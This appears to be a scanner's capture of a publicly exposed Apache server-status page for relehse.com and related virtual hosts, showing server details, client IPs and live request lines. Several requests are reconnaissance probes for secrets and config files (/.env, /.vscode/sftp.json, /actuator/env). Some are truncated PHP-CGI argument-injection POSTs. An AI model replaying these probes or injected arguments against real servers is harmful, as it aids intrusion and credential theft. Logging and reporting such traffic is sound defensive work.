0-5311255180/1/6930_ 1.6721070321480.00.00229.91 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 0-5311255180/0/7156_ 0.00109036730740.00.00200.12 172.70.207.211h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5311255180/1/6930_ 1.39109132511150.00.00163.35 104.22.1.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5311255180/2/7174_ 1.63114174806440.00.07205.17 104.23.251.169h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5311255180/1/6997_ 1.38939036755490.00.00326.45 172.68.71.157h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5311255180/0/7349_ 0.0094033834116320.00.00210.12 104.23.187.154h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5311255180/0/6915_ 0.002138833321680.00.00313.63 162.158.79.50h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-5311255180/1/7108_ 1.39114035258470.00.58223.07 172.71.22.183h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-5311256490/24/5552_ 3.241029459210.02.33237.66 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-5311256490/37/5469_ 3.233031703100.04.25157.48 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 1-5311256490/27/5386_ 3.243028649950.01.81183.89 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 1-5311256490/29/5326_ 3.246026387390.03.12109.00 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 1-5311256490/34/5556_ 3.240031928910.01.79177.34 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-5311256490/27/5420W 3.240033133370.00.61177.96 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 1-5311256490/27/5370_ 3.2410149446410.01.67157.25 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-5311256490/28/5430_ 3.226038916150.02.75176.60 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-5311256490/28/5386_ 3.241028565390.02.48211.98 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /actuator/env HTTP/1.1 1-5311256490/36/5590_ 3.234041523000.02.72129.81 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 2-5311255170/1/6241_ 1.36939039441770.00.00294.75 104.22.1.227h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/2/6215_ 1.631140106512210.00.00244.77 172.64.217.128h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/0/6326_ 0.00108031546680.00.00216.21 172.64.217.61h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/0/6289_ 0.00939187357620.00.00186.65 172.71.146.76h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/1/6250_ 1.37109037460940.00.02262.28 172.71.22.39h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/2/6391_ 1.37108035073760.00.08240.17 104.22.1.146h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/1/6301_ 1.37109032431510.00.00276.36 104.22.1.172h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/1/6344_ 1.37938041442040.00.00207.80 172.71.31.178h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/0/6177_ 0.00114039407450.00.00278.84 162.158.187.65h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-5311255170/2/6463_ 1.63113040559870.00.01202.40 162.158.91.180h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/3/8140_ 1.52114051677920.00.80258.98 172.69.70.217h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/1/7961_ 1.52109065885400.00.00255.16 172.71.30.143h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/0/7825_ 0.001090130506960.00.00297.64 172.71.147.183h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/0/7991_ 0.00114058108100.00.00259.49 209.38.70.130http/1.1done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/0/8252_ 0.00109056042810.00.00274.21 104.23.251.135h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/2/7838_ 1.81113054158720.00.36245.28 172.70.214.31h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/3/8043_ 1.53108066722260.00.71240.00 104.22.24.229h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/2/8204_ 1.81114059276090.00.03361.91 172.64.217.94h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/0/8120_ 0.00108055891270.00.00270.84 172.69.34.31h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-5311255190/2/8050_ 1.81114148192570.00.01241.76 172.64.217.14h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5311255160/20/5440_ 2.89160149078170.01.36236.73 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-5311255160/30/5247_ 2.892033820940.01.72151.07 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/swagger-ui.html HTTP/1.1 4-5311255160/18/5478_ 2.5815025259000.00.68180.43 185.91.69.5http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-5311255160/26/5482_ 2.9011043474250.02.26208.96 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 4-5311255160/31/5500_ 2.8913035036190.01.11149.57 143.110.213.72http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v3/api-docs HTTP/1.1 4-5311255160/28/5349_ 2.82
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27d89f5d18
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Saturday, 20-Dec-2025 16:26:33 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 37 Parent Server MPM Generation: 36 Server uptime: 7 days 9 hours 22 minutes 27 seconds Server load: 0.03 0.08 0.08 Total accesses: 209716 - Total Traffic: 7.6 GB - Total Duration: 143071792 CPU Usage: u80.99 s53.23 cu1162.05 cs710.77 - .314% CPU load .328 requests/sec - 12.5 kB/second - 38.0 kB/request - 682.217 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0795984no0yes010000 1795981no0yes010000 2795983no0yes010000 3796115no2yes19000 4795982no0yes010000 Sum502 149000 ___________________________________W______________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-367959840/80/4271_ 12.851020359130.01.15181.46 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-367959840/74/4437_ 12.836023971870.01.52146.32 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 0-367959840/70/4184_ 12.854024555530.02.14171.81 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 0-367959840/64/4400_ 12.72411423767920.00.82153.11 80.152.148.99http/1.1barrerasdecontencion.com:443POST /xmlrpc.php HTTP/1.1 0-367959840/72/4247_ 12.847021171830.01.22101.58 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 0-367959840/60/4507_ 12.832029015280.01.18150.39 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api/swagger.json HTTP/1.1 0-367959840/69/4390_ 12.848024966880.08.05209.05 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 0-367959840/78/4489_ 12.837019238170.02.31145.75 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 0-367959840/66/4296_ 12.853018026420.01.91242.76 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 0-367959840/76/4326_ 12.6817722139520.00.75145.60 80.152.148.99http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/22/3733_ 9.841181016501990.00.28161.71 172.69.7.131h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/28/3619_ 9.851219017333460.00.48103.72 172.70.179.70h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/24/3522_ 9.771214014302280.00.40135.07 162.158.123.7h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/26/3566_ 9.821219012348340.00.4258.53 172.69.17.196h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/30/3652_ 9.831186016752350.00.90138.63 172.70.127.199h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/34/3668_ 9.821214020182790.00.42135.51 172.70.178.40h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/21/3479_ 9.851186025543820.00.4598.00 104.23.253.51h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/36/3642_ 9.741181124243430.01.48134.82 188.114.111.236h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/22/3585_ 8.401214136314157720.00.42138.26 104.23.209.98h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-367959810/29/3758_ 9.821219228268100.00.4881.52 172.69.17.134h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/42/4581_ 9.691214117043340.00.68240.12 172.69.234.181h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/31/4509_ 11.191153083989980.00.76190.13 172.71.255.142h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/47/4564_ 11.241153016254080.02.36165.88 104.23.190.137h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/43/4575_ 9.831148055361510.00.66148.82 134.195.198.119http/1.1cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/47/4546_ 11.201219018763330.00.98196.69 172.71.254.80h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/40/4682_ 11.201148018046100.00.63194.48 162.159.106.33h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/51/4623_ 11.101214118506600.00.82232.83 162.158.123.79h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/45/4656_ 11.201223020883980.01.27171.26 172.69.17.103h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/42/4477_ 9.721222021018820.01.38203.43 172.69.234.178h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-367959830/47/4701_ 9.721219019771790.01.00137.91 172.69.234.173h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/510/5012_ 39.031024925730.019.02193.29 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger/v1/swagger.json HTTP/1.1 3-367961150/467/5056_ 39.0311941982500.08.75198.66 162.158.120.204h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/500/4869_ 38.96978106931360.09.87224.28 80.152.148.99http/1.1barrerasdecontencion.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-367961150/560/4936_ 39.0311028762780.012.07164.52 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /graphql/api HTTP/1.1 3-367961150/523/5079_ 39.0410034879030.018.64179.50 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /@vite/env HTTP/1.1 3-367961150/492/4819W 39.030029401630.09.08171.25 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 3-367961150/517/5062_ 39.056044361020.012.94186.43 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-367961150/521/5112_ 39.023233580240.016.64241.72 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-367961150/520/5032_ 39.052028171310.08.70173.52 159.89.174.87http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 3-367961150/509/4955_ 39.051024088300.08.40160.18 172.71.147.72h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-367959820/291/3374_ 23.9412290136646240.04.83137.72 172.71.255.46h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-367959820/295/3294_ 23.951219021128240.07.76103.88 172.69.6.123h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-367959820/291/3434_ 23.941229013109300.05.77127.51 172.69.6.88h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-367959820/264/3405_ 23.881214032089180.07.53162.01 162.158.123.242h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-367959820/260/3475_ 23.941229023810260.05.5088.61 172.70.178.28h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b273fe85c6d
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Thursday, 18-Dec-2025 19:18:07 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 27 Parent Server MPM Generation: 26 Server uptime: 5 days 12 hours 14 minutes 1 second Server load: 0.30 0.31 0.21 Total accesses: 169106 - Total Traffic: 6.1 GB - Total Duration: 112485075 CPU Usage: u127.4 s72.48 cu821.69 cs506.25 - .321% CPU load .355 requests/sec - 13.4 kB/second - 37.6 kB/request - 665.175 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0567200no0yes010000 1567063no0yes010000 2567066no1yes19000 3567064no1yes010000 4567065no0yes010000 Sum502 149000 ____________________W_____________________________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-265672000/404/3474_ 35.2262925115385100.014.59115.21 104.23.221.10h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/399/3594_ 32.22392016523520.028.5294.95 172.70.251.177h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/405/3337_ 35.5239743421619280.016.94141.51 104.23.221.20h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/411/3569_ 35.2739244017935820.011.10102.12 172.71.98.211h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/391/3442_ 32.83629117927270.07.1868.44 172.68.12.50h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/417/3693_ 35.4063530723801140.017.78116.52 172.70.250.182h2tandemsl.com:443idle, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-265672000/447/3567_ 32.05389220944130.046.23143.20 104.23.172.46h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-265672000/431/3684_ 35.533895314613090.015.87101.31 64.227.32.66http/1.1relehse.com:443POST /api/gql HTTP/1.1 0-265672000/403/3464_ 32.21630013844980.053.53194.73 104.23.239.132h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-265672000/432/3477_ 35.4063748315842570.023.98121.44 172.70.250.182h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/419/3105_ 31.39119447512681670.08.50119.31 104.23.223.78h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/371/2986_ 28.72278113259070.028.4688.42 64.190.114.235http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/407/2907_ 31.7143848710586390.019.31122.54 104.23.221.21h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/409/2950_ 30.3311895288632890.03.9244.10 104.23.211.82h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/400/3006_ 29.14433012159500.013.10122.90 172.68.164.50h2cinre.tandemhse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/431/3030_ 29.981189016211040.08.12101.73 104.22.24.57h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/379/2877_ 30.272784321066470.010.8279.22 172.71.135.79h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/396/3012_ 29.0811893020089140.07.2991.68 2.136.78.3h2pre.relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-265670630/455/2974_ 28.71433210473140.09.57125.88 64.190.114.235http/1.1relehse.com:443GET /admin_layout/assets/js/plugins.form-components.js HTTP/1.1 1-265670630/450/3142_ 31.8028342524303920.06.2769.75 104.23.221.21h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/473/3958W 41.050014085210.011.55211.59 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server-status HTTP/1.1 2-265670660/467/3945_ 41.077081884360.022.42179.19 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /server HTTP/1.1 2-265670660/472/3932_ 41.066013352380.018.22145.02 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 2-265670660/515/4000_ 40.90343953110600.025.29140.71 104.23.221.20h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/463/3895_ 41.080015823580.039.48178.64 104.23.223.118h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/526/4061_ 41.083015412900.021.70146.56 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-265670660/506/3995_ 41.081015272740.035.27215.46 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 2-265670660/521/4071_ 41.081018474310.035.92152.44 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 2-265670660/473/3887_ 41.03145915966200.031.03174.16 104.23.221.20h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-265670660/491/4061_ 41.0442817067800.036.10124.64 172.71.127.13h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/535/3415_ 41.971136312420770.030.95146.71 104.23.221.21h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/564/3519_ 41.931618501620.020.93139.50 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET / HTTP/1.1 3-265670640/519/3324_ 41.981054789223890.022.74170.94 104.23.221.11h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/591/3298_ 41.9510013870830.044.61133.17 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /api HTTP/1.1 3-265670640/501/3478_ 41.9810021919970.013.40104.39 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/500/3264_ 42.006011978360.011.38121.82 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /.vscode/sftp.json HTTP/1.1 3-265670640/541/3479_ 41.991042322144050.020.70116.15 172.71.184.98h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 3-265670640/539/3497_ 42.004016916170.067.13159.77 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /about HTTP/1.1 3-265670640/487/3399_ 41.993014118640.034.05135.74 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /api-docs/swagger.json HTTP/1.1 3-265670640/500/3340_ 41.9711013076090.040.04111.82 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger-ui.html HTTP/1.1 4-265670650/187/2968_ 21.09887395134269330.06.65129.89 162.159.113.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/170/2874_ 21.4943754618635580.06.3693.86 172.71.191.16h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/167/3005_ 21.533613410593670.03.41116.61 64.227.32.66http/1.1relehse.com:443GET /.env HTTP/1.1 4-265670650/188/3011_ 21.144322429652200.05.09152.31 104.23.229.4h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 4-265670650/228/3092_ 21.6616021375630.08.1177.97 167.99.210.137http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /swagger.json HTTP/1.1 4-26</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3136100b2736100b27a85e9fd6
Apache Status Apache Server Status for www.pre.relehse.com (via 103.23.61.80) Server Version: Apache/2.4.37 (rocky) OpenSSL/1.1.1k Server MPM: event Server Built: Apr 6 2023 16:38:06 Current Time: Tuesday, 16-Dec-2025 13:31:36 CET Restart Time: Saturday, 13-Dec-2025 07:04:06 CET Parent Server Config. Generation: 17 Parent Server MPM Generation: 16 Server uptime: 3 days 6 hours 27 minutes 30 seconds Server load: 0.21 0.15 0.19 Total accesses: 82853 - Total Traffic: 2.8 GB - Total Duration: 74186911 CPU Usage: u101.83 s46.85 cu395.78 cs271.81 - .289% CPU load .293 requests/sec - 10.5 kB/second - 35.8 kB/request - 895.404 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 0327518no1yes010000 1327515no4yes010021 2327649no5yes010040 3327516no1yes010000 4327517no1yes19000 Sum5012 149061 ________________________________________W_________ Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-163275180/87/2281_ 11.2292010925170.07.3275.38 172.70.35.153h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/61/2211_ 11.9692011766130.03.2038.57 162.158.123.230h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/40/2115_ 12.0411016625830.00.6885.10 172.70.80.229h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/59/2348_ 12.0811013597670.00.6944.39 104.22.24.32h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/55/2210_ 11.86633214309850.02.2944.15 136.226.214.101http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/57/2326_ 12.0493020072820.01.6256.59 172.69.214.149h2lcftech.es:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 0-163275180/53/2255_ 11.6863116448430.00.9965.74 104.23.217.125h2lcftech.es:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/70/2271_ 12.0396011395510.00.7751.14 108.162.241.67h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/51/2182_ 12.039619832420.00.7180.87 172.70.50.129h2lcftech.es:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 0-163275180/61/2227_ 11.68926511256500.01.0172.46 2.136.78.3h2relehse.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-163275150/81/1622_ 14.59104718830.010.3993.91 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/api-docs HTTP/1.1 1-163275150/105/1530_ 14.61107449500.02.2336.26 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-163275150/93/1503_ 14.62006181260.03.8484.60 172.69.71.102h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-163275150/73/1550_ 14.59105439550.02.4922.54 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-163275150/87/1576_ 14.57096167183040.023.0557.37 2.136.78.3h2relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-163275150/91/1500_ 14.600010404730.02.1458.38 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcPOST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disa 1-163275150/108/1506_ 14.61208004230.01.4549.63 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /v2/_catalog HTTP/1.1 1-163275150/92/1588_ 14.5611611334720.01.4760.30 136.226.214.101http/1.1relehse.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-163275150/76/1487_ 14.60004319370.02.1289.20 172.71.22.191h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 1-163275150/87/1623_ 14.62020010586450.01.1435.23 172.68.195.210h2tandemsl.com:443idle, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-163276490/734/1780_ 52.7922096794060.064.37137.02 108.162.237.121h2tandemsl.com:443idle, streams: 0/4/4/0/0 (open/recv/resp/push/rst) 2-163276490/724/1849_ 52.823074427580.023.9562.15 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcGET /debug/default/view?panel=config HTTP/1.1 2-163276490/712/1844_ 52.80206514690.026.8375.38 146.190.242.161http/1.17f7ffb32-1f6e-4d16-bdaa-07377bcdone, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-163276490/710/1824_ 52.8201978277640.024.5151.59 108.162.237.121h2tandemsl.com:443done, streams: 0/2/2/0/0 (open/recv/resp/push/rst) 2-163276490/685/1865_ 52.761239390860.050.2080.83 188.114.111.93h2tandemsl.com:443done, streams: 0/1/1/0/0 (open/recv/resp/push/rst) 2-163276490/728/1828_ 52.8002977007200.022.0842.51 108.162.237.121h2tandemsl.com:443idle, streams: 0/6/6/0/0 (open/recv/resp/push/rst) 2-163276490/755/1884_ 52.8323707771070.027.6483.42 108.162.237.121h2tandemsl.com:443idle, streams: 0/8/8/0/0 (open/recv/resp/push/rst) 2-163276490/706/1917_ 52.79309923070.029.3565.93 172.71.23.158h2tandemsl.com:443idle, streams: 0/1/1/0/0 